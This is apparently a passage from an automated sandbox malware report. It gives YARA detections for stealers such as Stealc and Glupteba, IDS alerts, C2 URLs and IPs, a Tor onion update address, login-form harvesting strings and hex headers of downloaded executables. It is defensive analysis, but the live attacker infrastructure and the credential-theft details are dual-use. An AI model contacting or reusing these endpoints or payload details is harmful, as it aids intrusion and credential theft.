38.2.nsn5FE8.tmp.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
38.2.nsn5FE8.tmp.exe.400000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
7.2.16E6.exe.23d0e67.1.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x1440fc:$string1: SELECT origin_url, username_value, password_value FROM logins 0x145e14:$string2: API call with %s database connection pointer 0x146968:$string3: os_win.c:%d: (%lu) %s(%s) - %s
30.0.BroomSetup.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
21.0.3ABE.exe.c50000.0.unpack	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x6bf141:$s1: Runner 0x6bf2a6:$s3: RunOnStartup 0x6bf155:$a1: Antis 0x6bf182:$a2: antiVM 0x6bf189:$a3: antiSandbox 0x6bf195:$a4: antiDebug 0x6bf19f:$a5: antiEmulator 0x6bf1ac:$a6: enablePersistence 0x6bf1be:$a7: enableFakeError 0x6bf2cf:$a8: DetectVirtualMachine 0x6bf2f4:$a9: DetectSandboxie 0x6bf31f:$a10: DetectDebugger 0x6bf32e:$a11: CheckEmulator
22.2.288c47bbc1871b439df19ff4df68f076.exe.2f50e67.10.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
22.3.288c47bbc1871b439df19ff4df68f076.exe.3840000.6.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
22.2.288c47bbc1871b439df19ff4df68f076.exe.400000.6.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
Click to see the 26 entries

Snort Signatures

ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 34.94.245.237 - Destination IP: 192.168.2.5

Timestamp:	34.94.245.237192.168.2.580497122037771 12/24/23-10:44:14.580335
SID:	2037771
Source Port:	80
Destination Port:	49712
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 34.143.166.163 - Destination IP: 192.168.2.5

Timestamp:	34.143.166.163192.168.2.580497142037771 12/24/23-10:44:16.767254
SID:	2037771
Source Port:	80
Destination Port:	49714
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 104.198.2.251 - Destination IP: 192.168.2.5

Timestamp:	104.198.2.251192.168.2.580497132037771 12/24/23-10:44:15.426503
SID:	2037771
Source Port:	80
Destination Port:	49713
Protocol:	TCP
Classtype:	A Network Trojan was detected

Binary string: D:\Visual Studio repos\MainBeast++\MainBeast++\Release\MainBeast++.pdb source: 16E6.exe, 16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 34.94.245.237:80 -> 192.168.2.5:49712
Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 104.198.2.251:80 -> 192.168.2.5:49713
Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 34.143.166.163:80 -> 192.168.2.5:49714

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 34.143.166.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.198.2.251 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.94.245.237 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 5.42.65.125 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 195.158.3.162 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.168.30 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 158.160.130.138 80	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 91.215.85.17 80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://77.91.76.36/3886d2276f6914c4.php
Source: Malware configuration extractor	URLs: http://snukerukeutit.org/
Source: Malware configuration extractor	URLs: http://lightseinsteniki.org/
Source: Malware configuration extractor	URLs: http://tyiuiunuewqy.org/
Source: Malware configuration extractor	URLs: http://liuliuoumumy.org/
Source: Malware configuration extractor	URLs: http://tonimiuyaytre.org/

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 212.118.39.73 ports 1,4,5,6,9,15649

Found Tor onion address

Source: 820.exe, 00000006.00000002.4437525490.0000000003799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onion/upd.php?n=64F78ABE71A43EFA66FB&v=2&b=49&p=2.1.4_3.1.6_4.2
Source: 820.exe, 00000006.00000002.4437239960.0000000003697000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onion/upd.php?n=64F78ABE71A43EFA66FB&v=2&b=49&p=2.1.4_3.1.6_4.2.5_4.3.4_4.4.1_4.5.1_4.6.1_4.7.1_5.1.3_6.1.16_7.1.3_8.1.1&nocache=1703411453
Source: 820.exe, 00000006.00000002.4437239960.0000000003697000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onion/upd.php?n=64F78ABE71A43EFA66FB&v=2&b=49&p=2.1.4_3.1.6_4.2.5_4.3.4_4.4.1_4.5.1_4.6.1_4.7.1_5.1.3_6.1.16_7.1.3_8.1.1&nocache=1703411453en)
Source: 820.exe, 00000006.00000002.4431451107.0000000000824000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Referer: X-Requested-With: XMLHttpRequest Content-Type: application/json;127.0.0.1:--ignore-missing-torrcect[] = --SOCKSPort--DataDirectory--bridgehttp://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/rep.phperr.php?&n=v=b=p=repsf=e=nocache=SEH exceptionSEHSTD: C++.dll4kPv6aJG8e\!update!sleep !regcheckcreateObjectwp-login.phpwp-admin/name="loginform"ionW[] = id="loginform"name="log"id="user_login"name="pwd"id="user_pass"administrator/administrator/index.php ] = id="form-login"action="/administrator= = id="mod-login-username"nd[] = name="username"id="mod-login-password" name="passwd"admin.phpDataLifesubactionusernamepasswordOK{

Source: unknown

Network traffic detected: IP country count 11

Source: global traffic	TCP traffic: 192.168.2.5:49720 -> 103.253.41.98:9001
Source: global traffic	TCP traffic: 192.168.2.5:49723 -> 212.118.39.73:15649
Source: global traffic	TCP traffic: 192.168.2.5:49726 -> 94.131.119.85:9001

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Dec 2023 09:44:31 GMTContent-Type: application/octet-streamContent-Length: 7079936Last-Modified: Sat, 23 Dec 2023 16:28:02 GMTConnection: keep-aliveETag: "65870a92-6c0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 92 0a 87 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 fe 6b 00 00 08 00 00 00 00 00 00 ae 1d 6c 00 00 20 00 00 00 20 6c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 6c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 1d 6c 00 57 00 00 00 00 20 6c 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 6c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 fd 6b 00 00 20 00 00 00 fe 6b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 48 05 00 00 00 20 6c 00 00 06 00 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 6c 00 00 02 00 00 00 06 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 1d 6c 00 00 00 00 00 48 00 00 00 02 00 05 00 7c 07 6c 00 d8 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 a3 df 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0Date: Sun, 24 Dec 2023 09:44:40 GMTContent-Type: application/octet-streamConnection: closeContent-Description: File TransferContent-Disposition: attachment; filename=96c4e674.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f9 46 1e c9 bd 27 70 9a bd 27 70 9a bd 27 70 9a a3 75 f4 9a 95 27 70 9a a3 75 e5 9a a7 27 70 9a a3 75 f3 9a 33 27 70 9a 9a e1 0b 9a ba 27 70 9a bd 27 71 9a 3c 27 70 9a a3 75 fa 9a bc 27 70 9a a3 75 e4 9a bc 27 70 9a a3 75 e1 9a bc 27 70 9a 52 69 63 68 bd 27 70 9a 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f8 15 ad 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e6 02 00 00 d6 01 00 00 00 00 00 6a 1f 00 00 00 10 00 00 00 00 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 04 00 00 04 00 00 b3 c4 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 2d 03 00 50 00 00 00 00 c0 03 00 20 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 10 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 66 e5 02 00 00 10 00 00 00 e6 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 3a 00 00 00 00 03 00 00 3a 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 fc 67 00 00 00 40 03 00 00 26 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 79 6f 76 6f 74 00 00 41 02 00 00 00 b0 03 00 00 04 00 00 00 4a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 24 01 00 00 c0 03 00 00 26 01 00 00 4e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 24 Dec 2023 09:44:45 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 24 Dec 2023 09:30:02 GMTETag: "4cc00-60d3e1802f34d"Accept-Ranges: bytesContent-Length: 314368Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f9 46 1c c9 bd 27 72 9a bd 27 72 9a bd 27 72 9a a3 75 f6 9a 95 27 72 9a a3 75 e7 9a a7 27 72 9a a3 75 f1 9a 33 27 72 9a 9a e1 09 9a ba 27 72 9a bd 27 73 9a 3f 27 72 9a a3 75 f8 9a bc 27 72 9a a3 75 e6 9a bc 27 72 9a a3 75 e3 9a bc 27 72 9a 52 69 63 68 bd 27 72 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 1d 4b 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 3e 03 00 00 d6 01 00 00 00 00 00 6a 1f 00 00 00 10 00 00 00 50 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 22 00 00 04 00 00 bb e5 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 7d 03 00 50 00 00 00 00 10 04 00 20 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 03 00 14 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 3c 03 00 00 10 00 00 00 3e 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa 39 00 00 00 50 03 00 00 3a 00 00 00 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 fc 67 00 00 00 90 03 00 00 26 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 75 7a 00 00 00 00 41 02 00 00 00 00 04 00 00 04 00 00 00 a2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 c4 1e 00 00 10 04 00 00 26 01 00 00 a6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Dec 2023 09:44:52 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Dec 2023 09:45:01 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
